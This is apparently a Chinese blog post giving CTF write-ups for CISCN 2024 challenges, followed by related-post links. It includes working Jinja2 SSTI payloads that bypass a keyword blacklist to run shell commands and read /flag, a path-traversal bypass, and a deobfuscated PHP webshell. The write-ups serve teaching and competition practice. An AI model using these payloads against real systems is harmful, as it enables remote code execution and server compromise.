ciscn2024

于 2024-12-20 20:46:08 发布
阅读量646 收藏 10
点赞数 15
分类专栏: CTF 文章标签: 网络安全 web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80148821/article/details/144619312
版权

Safe_Proxy

开始就可以看到源码

自己本地搭建一个,并修改下代码,让他变成可以看到回显的ssti,先绕过黑名单再说

from flask import Flask, request, render_template_string  
import socket  
import threading  
import html  
  
app = Flask(__name__)  
  
  
@app.route('/', methods=["GET"])  
def source():  
    with open(__file__, 'r', encoding='utf-8') as f:  
        return '<pre>' + html.escape(f.read()) + '</pre>'  
  
  
@app.route('/', methods=["POST"])  
def template():  
    template_code = request.form.get("code")  
    # 安全过滤  
    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']  
    for black in blacklist:  
        if black in template_code:  
            return "Forbidden content detected!"  
    result = render_template_string(template_code)  
    print(result)  
    return f'{result}' if result is not None else 'error' #这里换了,本来返回ok的,为了方便测试和写题直接换成返回值了,这样就有回显了  
  
  
class HTTPProxyHandler:  
    def __init__(self, target_host, target_port):  
        self.target_host = target_host  
        self.target_port = target_port  
  
    def handle_request(self, client_socket):  
        try:  
            request_data = b""  
            while True:  
                chunk = client_socket.recv(4096)  
                request_data += chunk  
                if len(chunk) < 4096:  
                    break  
  
            if not request_data:  
                client_socket.close()  
                return  
  
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:  
                proxy_socket.connect((self.target_host, self.target_port))  
                proxy_socket.sendall(request_data)  
  
                response_data = b""  
                while True:  
                    chunk = proxy_socket.recv(4096)  
                    if not chunk:  
                        break  
                    response_data += chunk  
  
            header_end = response_data.rfind(b"\r\n\r\n")  
            if header_end != -1:  
                body = response_data[header_end + 4:]  
            else:  
                body = response_data  
  
            response_body = body  
            response = b"HTTP/1.1 200 OK\r\n" \  
                       b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \  
                                                                                b"Content-Type: text/html; charset=utf-8\r\n" \  
                                                                                b"\r\n" + response_body  
  
            client_socket.sendall(response)  
        except Exception as e:  
            print(f"Proxy Error: {e}")  
        finally:  
            client_socket.close()  
  
  
def start_proxy_server(host, port, target_host, target_port):  
    proxy_handler = HTTPProxyHandler(target_host, target_port)  
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
    server_socket.bind((host, port))  
    server_socket.listen(100)  
    print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")  
  
    try:  
        while True:  
            client_socket, addr = server_socket.accept()  
            print(f"Connection from {addr}")  
            thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))  
            thread.daemon = True  
            thread.start()  
    except KeyboardInterrupt:  
        print("Shutting down proxy server...")  
    finally:  
        server_socket.close()  
  
  
def run_flask_app():  
    app.run(debug=False, host='127.0.0.1', port=5000)  
  
  
if __name__ == "__main__":  
    proxy_host = "0.0.0.0"  
    proxy_port = 5001  
    target_host = "127.0.0.1"  
    target_port = 5000  
  
    # 安全反代,防止针对响应头的攻击  
    proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))  
    proxy_thread.daemon = True  
    proxy_thread.start()  
  
    print("Starting Flask app...")  
    run_flask_app()

然后直接上fenjing梭哈本地的,就不自己构造了

![[Pasted image 20241215141943.png]]

得到payload

{%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set ug='so'[::-1]%}{{((g.pop[gl][bu][im](ug))['p''open']('echo f3n  j1ng;')).read()}}

然后其实本来想反弹shell的,但是弹半天不太行。。。

然后准备写文件,试了1.txt这些也不太行,其实这时候已经没有啥思路了,

但是,突然想到2023CISCN-gosession中go语言的ssti更改了python的app.py,所以app.py是可以更改的,而这个题中app.py可以直接被读取到,所以直接读取到app.py里面去就行了。

{%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set ug='so'[::-1]%}{{((g.pop[gl][bu][im](ug))['p''open']('ls | tee app.py')).read()}}

就是这个环境就只能用一次,有点难受

![[屏幕截图 2024-12-15 115625.png]]

{%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set ug='so'[::-1]%}{{((g.pop[gl][bu][im](ug))['p''open']('cat /flag | tee app.py')).read()}}

![[Pasted image 20241215143044.png]]

然后就得到flag了

hello_web

一开始试了蛮久,没找到什么有用信息,但是当访问…/…/…/flag甚至…/…/…/都为当file不输入东西的时候的界面时,可以猜测…/是不是被换掉了

尝试双重绕过,成功绕过了

/index.php?file=…//hackme.php

发现源码,

`<?php   highlight_file(__FILE__);   $lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");   $YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};$rVkKjU=$lapUCm{7}.$lapUCm{13};$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));   ?>`

解密题,之前做过,一般就是个一句话木马。

进行解密,一个个排出来,就可以得到密码了

<?php  
highlight_file(__FILE__);  
$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";  
$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";  
$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");  
$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};  
//echo $YwzIst; //base  
$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};  
//echo $OxirhK; //strtr  
//echo "<br>";  
$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};  
//echo $YpAUWC; //substr  
//echo "<br>";  
$rVkKjU=$lapUCm{7}.$lapUCm{13};  
//echo $rVkKjU; //52  
$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};  
//echo $YwzIst; //base64_decode  
//eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));  
$uWcdaA="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==";  
eval('?>'.$YwzIst($OxirhK($YpAUWC($uWcdaA,$rVkKjU*2),$YpAUWC($uWcdaA,$rVkKjU,$rVkKjU),$YpAUWC($uWcdaA,0,$rVkKjU))));  
  
$aaa=base64_decode(strtr(substr("eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==",104),substr("eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==",52,52),substr("eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==",0,52)));  
  
echo $aaa;  
?>  
  
  
  
<!--$uWcdaA="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==";-->  
<!--eval('?>'.$YwzIst($OxirhK($YpAUWC($uWcdaA,$rVkKjU*2),$YpAUWC($uWcdaA,$rVkKjU,$rVkKjU),$YpAUWC($uWcdaA,0,$rVkKjU))));-->

<?php  
$aaa=base64_decode(strtr(substr("eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==",104),substr("eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==",52,52),substr("eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==",0,52)));  
  
echo $aaa;  
?>

![[Pasted image 20241215135222.png]]

由于是下滑线,在php传入参数中只有碰到无法解析符号的才会被解析为下滑线所以使用[ 进行post传参。蚁剑连接,

![[Pasted image 20241215140919.png]]

然后发现没有权限查找东西。。。而且flag不在根目录

本来想提权的,但是到处翻,在/run/log找到flag,就不提权了

![[Pasted image 20241215140452.png]]

WinFT_2

首先思路是正常的应急响应思路,可以参考链接

https://xz.aliyun.com/t/12832

win +R

输入services.msc

到任务计划管理器里面,然后看到base64字符

![[Pasted image 20241215155403.png]]

然后解密得到flag

![[Pasted image 20241215155427.png]]

第一届“长城杯”信息安全铁人三项(四场)部分题目wp
weixin_67961126的博客
04-02 1930
首先看到流量分析的题目用wireshark,再导出http对象列表在zip对象中发现了files.zip。然后尝试暴力破解没有得到密码想着去分析一下文件用到的winhex。根据题目描述的提示结合之前没用到的key,des解码得到flag。就想着是不是还有别的加密----就想到了去检查一下是不是伪加密。发现这么多==是base64隐写,跑脚本得到。得到了key的值是66666666。是伪加密,改09为00。
2024网络安全最全CVE-2024-3580 Cisco ASA安全软件XSS漏洞
2401_84254087的博客
05-01 233
利用难度 | 低 || 360CERT评分 | 6.1 |
第一届长城杯初赛部分wp(个人解题思路)
qq_74806534的博客
04-05 3202
访问蚁剑连接访问/var/www/html/u_c4nt_f1nd_flag.php。
长城杯线下赛赛后复现
fmyyy1的博客
10-14 1623
长城杯线下赛赛后复现 前言 去打了长城杯决赛,结果全程坐牢,果然不联网的web太难了,赛后拿到了两个web靶机的wp,复现一下。 fancyapi 目录结构 逻辑很简单,web用的是python的flask框架,然后go写了几个接口处理数据。 看看backend.go func Flag(w http.ResponseWriter, r *http.Request ) { action:= r.URL.Query().Get("action") if action == "" { fail(w,
2023长城杯 web部分题目(seeking&easy_extension)
weixin_63231007的博客
09-13 1966
2023 京津冀网络安全比赛 web部分wp
第四届长城杯部分wp
weixin_74427106的博客
09-09 1610
还是太菜了,要经常练了。
CISCO2024年全球网络趋势报告.pdf
08-02
【CISCO】2024年全球网络趋势报告.pdf【CISCO】2024年全球网络趋势报告.pdf【CISCO】2024年全球网络趋势报告.pdf【CISCO】2024年全球网络趋势报告.pdf【CISCO】2024年全球网络趋势报告.pdf【CISCO】2024年全球网络...
思科2024 AI就绪数据中心白皮书解析:企业部署与挑战及解决方案
最新发布
01-13
内容概要:本文档探讨了2024年思科发布的关于AI就绪数据中心白皮书中详细的内容和技术方案,特别关注企业在实施AI项目中所遇到的关键问题及其对应的解决办法。文中首先介绍了思科最新的人工智能就绪指数报告,强调...
2024思科AI就绪数据中心白皮书.pdf
12-13
思科2024人工智能就绪数据中心白皮书详细阐述了在当前技术颠覆背景下,企业部署人工智能(AI)所面临的压力和挑战。白皮书指出,尽管AI在业界占据主导地位,并对企业战略具有重大影响,但企业在部署AI时仍缺乏充分的...
Cisco Packet Tracer 8.2.2 X86
03-11
当系统提示您登录并使用 Cisco Packet Tracer 8.2.2 时,在登录服务器下拉框中选择China 。 然后单击蓝色的 Cisco Networking Academy 图标开始登录过程。 在登录屏幕中输入所需的详细信息。 当登录屏幕关闭时,您已...
2024长城杯铁人三项, Python代码分析题crypto WP
xingmiao0的博客
04-02 1227
temp = (x * flag中的每个字符的十进制ascii码值 + y) % 251。
第一届长城杯 部分WP
mumuzi的博客
09-19 2883
平台没交WP,一是19名肯定进不了,二是步骤多懒得写,三是队里的密码????赶高铁去了。 签到 16进制的ascii+base64,手速是吧,直接一血。 flag{Welcome_to_changchengbe1} 你这flag保熟吗 前面不说了,两张图片尾部都有rar,提取出来一个hint和一个password的表格,hint给了16位的base64,加密之后和表格比较,发现 哦~,原来是希尔伯特曲线 观察和写脚本经历了长达1个多小时的斗争。 用希尔伯特曲线来提取此表格的脚本如下。(根据百度) fr
第一届“长城杯”信息安全铁人三项赛初赛(第三赛区)部分题目wp
m0_74426634的博客
04-02 2233
第一届“长城杯”信息安全铁人三项赛初赛(第三赛区)部分题目wp(会持续更新)
2024长城杯-第五场-流量分析wp
qq_67760645的博客
04-11 2094
查看了一下流量包里的协议包,发现只有TLS协议进行了加密。使用冰蝎4.0自带的解密脚本进行解密,协议名称那里根据前面发现的代码判断出是xor+base64。先把这段数据放入冰蝎进行解密,然后把这个cmd变量的这段base64进行解码,发现将这段串数字输入到文件中,文件名带有passwd。得到了flag{Keep_going_jpg},但是这个flag是错误的。但是这个flag里面的内容就是图片的文件名+文件后缀。说明解题还是看这个图片。查看那个key文件,拖入十六进制查看工具发现这个是RSA加密的key。
第一届长城杯半决赛wp和AWD笔记
qq_74806534的博客
04-25 3485
网站备份文件泄露可能造成的危害:1. 网站存在备份文件:网站存在备份文件,例如数据库备份文件、网站源码备份文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。2. 敏感文件泄露是高危漏洞之一,敏感文件包括数据库配置信息,网站后台路径,物理路径泄露等,此漏洞可以帮助攻击者进一步攻击,敞开系统的大门。3. 由于目标备份文件较大(xxx.G),可能存在更多敏感数据泄露4. 该备份文件被下载后,可以被用来做代码审计,进而造成更大的危害。
2022长城杯部分题目 web djangogogo| misc办公室爱情复现
m0_62107966的博客
09-03 1361
长城杯部分题目 web djangogogo| misc办公室爱情复现。 首先任意加入个参数,看到报错了,这里返回了一些系统信息:这里的环境是purchase_date,往下找,发现了extract函数,联想到Django里extract函数的sql注入漏洞。
长城杯2021政企组-魔鬼凯撒的RC4茶室 WP
Sciurdae的博客
12-29 1053
前面看起来像是RC4加密,结合题目一开始也以为是RC4,实际上并没有发现key。尝试之后,发现下面俩个加密实际都不重要。根据程序后面可以知道,flag片段里面的flag就是密文,拿密文和key异或可以得到前半段flag。有个小技巧,这里传入的参数是Str字符串,但是原本IDA自动识别出来的类型是。,所以直接看就是很多(BYTE *)类型转换,可以直接对a1按。输入1111122222为flag,动态调试。UPX壳,upx -d直接脱。这样就特别容易看了,其他题目同理。正确,也就得到了后半部分flag。
第十八届信息安全大赛 && 第二届长城杯WP,web方向:Safe_Proxy,hello_web
2202_75361164的博客
12-17 636
开始就可以看到源码自己本地搭建一个,并修改下代码,让他变成可以看到回显的ssti,先绕过黑名单再说然后直接上fenjing梭哈本地的,就不自己构造了得到payload然后其实本来想反弹shell的,但是弹半天不太行。。。然后准备写文件,试了1.txt这些也不太行,其实这时候已经没有啥思路了,
思科SLM2024交换机配置指南:打造高效企业千兆网络
"华塞安全产品配置教程详细介绍了如何配置一款针对中小企业的CISCO SLM2024智能型交换机,旨在构建高速且稳定的企业内部网络环境。该交换机提供24个千兆以太网端口和2个SFP上行链路接口,具有48Gbps交换容量,支持无...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

follycat

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值